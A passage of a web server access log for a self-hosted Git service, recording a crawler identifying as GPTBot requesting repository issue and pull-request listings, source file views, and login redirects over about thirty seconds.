(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11263] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:19:32:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:19:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:19:32:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:19:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:19:32:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:19:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:19:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11638] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" -[17/Feb/2026:19:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11304] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:19:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 